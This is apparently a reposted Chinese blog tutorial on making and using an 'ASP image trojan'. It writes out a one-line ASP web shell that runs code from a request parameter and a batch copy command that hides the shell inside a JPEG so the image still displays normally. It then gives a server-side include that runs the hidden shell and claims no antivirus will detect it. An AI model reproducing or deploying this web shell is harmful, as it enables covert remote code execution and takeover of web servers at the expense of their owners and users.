渗透之——asp图片木马的制作和使用
生活随笔
收集整理的這篇文章主要介紹了
渗透之——asp图片木马的制作和使用
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
轉載請注明出處:https://blog.csdn.net/l1028386804/article/details/84959588
主要亮點:圖片木馬(可以正常打開顯示的木馬)
先看代碼:
僅需幾步:圖片和一句話木馬合并,制作可以正常顯示的圖片木馬。
1、找一張圖片,名字改成1.jpg
2、<%eval request(“a”)%>存為1.asp(就是一句話木馬)
3、copy 1.jpg /b + 1.asp /a asp.jpg 存為1.bat文件
注:以上三個文件放在同一目錄里面
復制當前目錄下的1.jpg圖片和當前目錄下的1.asp文件并以ASCII代碼的方式合并為 asp.jpg圖片,運行1.bat,就會出現一個圖片asp.jpg,現在這個asp.jpg就是已經做好的木馬了。
這個圖片外表很正常,用縮略圖也看不出任何破綻,但是卻非常的危險,讓人防不勝防。
利用方法:新建一個asp.asp 內容為:
<!–#include file=”asp.jpg”–>
把asp.jpg 和 asp.asp 放在同一目錄,然后訪問: asp.asp?? 用這種方法,任何殺毒是搜不到的
總結
以上是生活随笔為你收集整理的渗透之——asp图片木马的制作和使用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Angular实战项目(1)
- 下一篇: linux debian教程,Debia